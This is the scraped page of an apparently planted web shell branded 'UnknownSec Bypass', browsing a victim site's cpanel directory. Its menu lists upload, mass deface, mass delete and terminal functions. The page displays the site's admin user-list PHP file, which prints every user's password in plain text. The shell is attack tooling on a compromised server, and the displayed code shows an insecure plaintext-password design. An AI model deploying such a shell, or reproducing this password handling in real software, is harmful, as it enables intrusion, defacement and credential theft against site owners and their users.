UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
cpanel
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
list_userlist.php
<?php include "top.php";?> <div id="layoutSidenav_content"> <main> <div class="container-fluid px-4"> <h1 class="mt-4">User List</h1> <ol class="breadcrumb mb-4 justify-content-between"> <li class="breadcrumb-item active">List of User</li> <a class="btn btn-primary" href="add_user.php">Add User</a> </ol> <div class="card mb-4"> <div class="card-header"> <i class="fas fa-table me-1"></i> User List </div> <div class="card-body"> <?php $sql= "Select * from logintb"; $result=mysqli_query($conn, $sql) or die("Query Failed."); if (mysqli_num_rows($result)>0) { ?> <table id="datatablesSimple"> <thead> <tr> <th>S.No.</th> <th>Name</th> <th>Mobile No.</th> <th>UserName</th> <th>Password</th> <th>Userrole</th> <th>Edit</th> <th>Status</th> </tr> </thead> <tbody> <?php $serial= 1; while ($row = mysqli_fetch_assoc($result)) { ?> <tr> <td><?php echo $serial;?></td> <td><?php echo $row['uname'];?></td> <td><?php echo $row['mobileno'];?></td> <td><?php echo $row['username'];?></td> <td><?php echo $row['password'];?></td> <td><?php echo $row['userrole'];?></td> <td> <a href='add_user.php?id=<?php echo $row["id"]; ?>&op=<?php echo "Edit"; ?>'><i class=" glyphicon glyphicon-pencil"></i> Edit</a> </td> <td> <?php if($row['status']=="1") { ?> <a href='add_user.php?id=<?php echo $row["id"]; ?>&op=<?php echo "Active"; ?>'><i class=" glyphicon glyphicon-pencil"></i> Active</a> <?php } else { ?> <a href='add_user.php?id=<?php echo $row["id"]; ?>&op=<?php echo "DeActive"; ?>'><i class=" glyphicon glyphicon-pencil"></i> DeActive</a> <?php } ?> </td> </tr> <?php $serial++; } } ?> </tbody> </table> </div> </div> </div> </main> <?php include "footer.php";?>
Copyright © 2025 - UnknownSec